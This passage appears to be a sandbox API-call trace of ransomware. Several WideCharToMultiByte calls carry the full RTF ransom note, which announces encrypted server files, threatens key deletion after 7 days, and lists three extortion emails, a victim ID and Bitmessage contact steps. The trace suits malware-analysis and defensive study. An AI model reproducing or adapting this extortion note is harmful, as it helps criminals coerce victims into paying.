dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.057] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.058] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.058] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd 